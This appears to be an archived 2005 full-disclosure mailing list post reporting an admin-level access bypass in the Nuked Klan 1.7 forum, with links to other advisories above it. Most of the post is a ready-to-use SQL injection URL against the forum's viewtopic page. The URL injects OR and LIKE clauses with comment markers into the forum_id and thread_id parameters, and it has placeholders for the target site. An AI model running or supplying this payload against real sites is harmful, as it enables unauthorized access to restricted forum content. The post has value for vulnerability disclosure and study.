Related information

Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

File Including In PBLang

[SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

[SA17353] gCards "limit" SQL Injection Vulnerability

[Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

From:	papipsycho_(at)_hotmail.com <papipsycho_(at)_hotmail.com>
Date:	25.10.2005
Subject:	Nuked klan 1.7: Bypassed level admin on forum(corrected)

########################################
###                                  ###
### mail/msn: papipsycho@hotmail.com ###
###                                  ###
########################################

remplace [THREAD_ID] >  id of the thread that you want to see
remplace [FORUM_ID] >  id of the forum in which your thread is

that allow you to view the post level admin

http://[target]/index.
php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]' OR id LIKE '%%' /*&thread_id=[THREAD_ID]' AND auteur_id LIKE '%%' /*